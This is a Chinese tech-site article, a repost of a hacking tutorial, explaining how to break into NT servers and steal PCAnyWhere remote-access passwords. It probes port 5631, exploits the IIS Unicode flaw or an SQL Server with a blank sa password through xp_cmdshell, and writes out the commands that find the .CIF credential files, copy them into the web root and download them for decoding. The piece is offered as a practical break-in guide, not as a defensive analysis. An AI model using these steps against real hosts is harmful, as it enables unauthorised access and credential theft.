电脑爱好者,提供IT资讯信息及各类编程知识文章介绍,欢迎大家来本站学习电脑知识。 最近更新 | 联系我们 RSS订阅本站最新文章
电脑爱好者
站内搜索: 
当前位置:首页>> 网络安全>>如何破解PCAnyWhere的密码:

如何破解PCAnyWhere的密码

来源:远方网络 | 2005-4-11 15:00:03 | (有2137人读过)

文章分类: 网络安全
文章标题:
关 键 字: 如何破解PCAnyWhere的密码
文章作者: alonglee转
文章来源: http://heibai.net
发表时间: 2004-8-11 10:07:00


如何破解PCAnyWhere的密码

由于NT的机器一般使用PCAnyWhere进行远程管理,Win2K的机器一般使用了终端进行远程管理,因此如果能够得到PCAnyWhere远程连接的帐号和密码,那么就能远程连接到主机。
问题的关键就是要得到PCAnyWhere的密码文件(*.CIF),然后使用PCanyWhere密码查看工具(
http://www.csdn.net/soft/openfile.asp?kind=2&id=7824)便可以取得帐号和密码。

PCAnyWhere服务端使用5631端口,可以使用:

Telnet 10.10.10.10 5631

确定远程主机的PCAnyWhere服务端是否开启动。

下面介绍两种方法去得到PCAnyWhere的密码文件:
方法一: 使用Unicode漏洞+ PCanyWhere密码查看工具

下面将使用Unicode工具演示如何使用Unicode漏洞来得到PCAnyWhere的密码文件(*.CIF)。

工具下载:

Pcanywhere9.2: http://www.symantec.com/ ;

下载的Pcanywhere9.2有使用期限,
步骤如下:

找到主机上的*.CIF文件。
复制该文件到网站目录下。
使用IE下载该文件。
使用PcanywherePWD得到用户名和密码。
连接登陆。
具体步骤:

找到主机上的*.CIF文件
使用dir c:\*.cif /s命令:

一般Citempl.cif为系统默认的密码文件,因此我们需要SA.CIF文件。

复制该文件到网站目录下。
需要知道网站目录,可以通过ida,idq漏洞进行得到,也可以去寻找网站中的一个图片文件,比如Tscontent.gif文件,然后去查找该文件:使用命令
dir c:\ Tscontent.gif /s

知道目录后,比如为c:\inetpub\wwwroot\

密码文件所在目录:c:\Program Files\pcANYWHERE\DATA

下面执行Copy命令:

显示1 file(s) copied,就表示复制成功了。

使用IE下载该文件
使用 http://1.1.1.1/sa.cif就可以下载该文件了。

使用PCanyWhere密码查看工具得到用户名和密码

远程连接
 
方法二: 使用SQLServer+ PCanyWhere密码查看工具工具

由于有些网站的SQLServer的Sa密码一般为空,或者为Sa,也可能和域名相同,如果远程连接到主机的数据库中,同样可以得到密码文件:

方法如下:

使用: XP_Cmdshell ‘dir c:\*.cif /s’

找到密码文件,然后复制到网站目录下:

XP_Cmdshell ‘copy c:\pcanywhere\sa.cif
c:\inetpub\wwwroot’

然后下载,得到用户名和密码。



网络安全热门文章排行
网站赞助商
购买此位置

 

关于我们 | 网站地图 | 文档一览 | 友情链接| 联系我们

Copyright © 2003-2024 电脑爱好者 版权所有 备案号:鲁ICP备09059398号